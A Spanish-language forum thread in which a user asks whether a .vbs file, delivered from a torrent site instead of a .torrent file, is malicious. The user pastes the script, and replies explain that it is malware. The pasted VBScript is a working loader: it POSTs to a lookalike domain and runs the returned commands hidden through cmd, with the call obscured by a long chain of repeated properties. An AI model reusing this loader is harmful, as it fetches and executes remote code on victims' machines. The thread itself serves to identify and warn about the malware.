Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

¿Archivo .vbs dentro de un .torrent es malicioso?

Potere

En la web mejortorrentt.net intento bajar el archivo .torrent que viene dentro de un .zip y el antivirus de Windows me salta diciendo que tiene virus.

Desactivo el antivirus, me descarga el .zip y dentro hay un archivo .vbs (debería ser .torrent como ha sido siempre). Me pasa en varias webs.

Abro el archivo con un editor de texto y sale este código:

Set ypencj4 = CreateObject("WinHttp.WinHttpRequest.5.1")
ypencj3 = Wscript.ScriptName
ypencj4.open "POST", "http://www.mejortorrentt.org/img/ab/ypencj", False
ypencj4.send
CreateObject("Shell.Application").Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.ShellExecute "cmd",ypencj4.responseText & ypencj3,ypencj,"",0

¿Es malicioso de verdad?

BocaDePez
BocaDePez

Date por infectado, por norma general esos virus lo que te instalan en un minador de criptomonedas, seguramente que ya estas minando, lo notarás porque el equipo te va lento y los ventiladores van a full.

Al ejecutar el administrador de tareas para ver que servicio está tirando más de la CPU se desactiva para que no averigües donde está el problema. Te recomiendo que salves tus datos y formatees el equipo, ya que quitar este malware te va costar sudor y lagrimas.

🗨️ 1
BocaDePez
BocaDePez

Ha dicho que no lo ha ejecutado… Si sólo ha mirado el código, no hay riesgo

BocaDePez
BocaDePez

Si ten cuidado que es un virus, de hecho descubrí que tiene truco si miras o pones la pagina en modo móvil te descarga el torrent normal en vez del virus vbs

marcelg

En torrent todo lo que no sea .torrent o el magnet es mala cosa=virus o similar!

He probado una descara desde esa web desde el firefox en w10 y me salido bien, nada de zip, fichero torrent en ese caso.

🗨️ 1
BocaDePez
BocaDePez

Lo que dice el compi, los archivos torrent no van comprimidos. Ese zip tiene un caramelito chupao ;).

MrPlow

grantorrent.li usando hola vpn como extensión o cualquier vpn que gustes, tambien tienes dontorrent.org sin vpn ni nada

Spyd
2

⚠️ Es malicioso.

Los archivos .vbs son pequeños programas escritos en Visual Basic Script que ejecutan comandos del sistema. Ese código en concreto lo que hace es una petición POST la URL http://www.mejortorrentt.org/img/ab/ypencj para descargar un archivo, y luego abre una línea de comandos y ejecuta el archivo descargado:

image.png

El código que ves en la imagen parece que descarga varios archivos para sustituir los originales de Windows, así que se puede decir que es malicioso.

BocaDePez
BocaDePez

Ponte una extension en el navegador que se llama agent switcher, le marcas que se identifique como sistema macos o linux y caso cerrado, los torrent descsrgaran bien.

🗨️ 1
Potere

acabo de probarlo. he elegido IOS, y se ha descargado el .torrent

mil gracias! no conocia esa extension

BocaDePez
BocaDePez

Desde hace tiempo no se puede descargar de mejortorrent porque pasa eso…

🗨️ 1
Potere

entonces el problema está en esa web en concreto? tienen los archivos infectados?

BocaDePez
BocaDePez

Debes usar www.dontorrent.org

Es lo mismo que mejortorrent pero sin el virus.

Potere

desde otro SO se descarga el .torrent sin problemas

🗨️ 1
BocaDePez
BocaDePez

Pues nada compi, sigue usando con triquiñuelas una web que intenta meterte virus al menor despiste.

En vez de usar una alternativa limpia.